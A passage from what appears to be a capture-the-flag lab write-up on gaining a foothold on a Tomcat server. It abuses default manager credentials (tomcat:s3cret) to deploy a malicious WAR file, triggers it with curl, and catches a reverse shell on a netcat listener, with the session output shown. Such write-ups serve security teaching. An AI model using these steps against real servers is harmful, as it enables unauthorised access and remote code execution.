Malicious WAR Deployment
Due to the default credential being used on the target Tomcat instance, it is possible to access the Tomcat Web Application Manager at the /manager/html endpoint
Deployment can be made directly from the web page
or it could be done via command line
referring to the official documentation of Tomcat 8.5, WAR file can be deployed remotely via a HTTP request
Deployment
┌──(kali㉿kali)-[~/archive/thm/thompson]
└─$ curl --upload-file shell.war 'http://tomcat:s3cret@10.10.206.196:8080/manager/text/deploy?path=/shell'
[...REDACTED...]
<body>
<h1>403 Access Denied</h1>
<p>
You are not authorized to view this page.
</p>
<p>
By default the Manager is only accessible from a browser running on the
same machine as Tomcat. If you wish to modify this restriction, you'll need
to edit the Manager's <tt>context.xml</tt> file.
</p>
<p>
If you have already configured the Manager application to allow access and
you have used your browsers back button, used a saved book-mark or similar
then you may have triggered the cross-site request forgery (CSRF) protection
that has been enabled for the HTML interface of the Manager application. You
will need to reset this protection by returning to the
<a href="/manager/html">main Manager page</a>. Once you
return to this page, you will be able to continue using the Manager
appliction's HTML interface normally. If you continue to see this access
denied message, check that you have the necessary permissions to access this
application.
</p>
<pre>
<role rolename="manager-gui"/>
<user username="tomcat" password="s3cret" roles="manager-gui"/>
</pre>
<p>
Note that for Tomcat 7 onwards, the roles required to use the manager
application were changed from the single <tt>manager</tt> role to the
following four roles. You will need to assign the role(s) required for
the functionality you wish to access.
</p>
<ul>
<li><tt>manager-gui</tt> - allows access to the HTML GUI and the status
pages</li>
<li><tt>manager-script</tt> - allows access to the text interface and the
status pages</li>
<li><tt>manager-jmx</tt> - allows access to the JMX proxy and the status
pages</li>
<li><tt>manager-status</tt> - allows access to the status pages only</li>
</ul>
[...REDACTED...]Uploading the WAR payload failed. It would appear that the current credential doesn’t have the manager-script role but only the manager-gui role
Deploying the WAR payload via the web GUI
Uploaded
┌──(kali㉿kali)-[~/archive/thm/thompson]
└─$ curl -i http://$IP:8080/shell/
HTTP/1.1 200
Set-Cookie: JSESSIONID=31D0682EECAABD08B92A0F0E8D0549A7;path=/shell;HttpOnly
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6
Date: Fri, 12 Jul 2024 10:39:14 GMTTriggering the uploaded WAR payload
┌──(kali㉿kali)-[~/archive/thm/thompson]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.2.95] from (UNKNOWN) [10.10.206.196] 38656
whoami
tomcat
hostname
ubuntu
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:06:04:b4:07:01 brd ff:ff:ff:ff:ff:ff
inet 10.10.206.196/16 brd 10.10.255.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::6:4ff:feb4:701/64 scope link
valid_lft forever preferred_lft foreverInitial Foothold established to the target system via malicious WAR file upload on the target Tomcat instance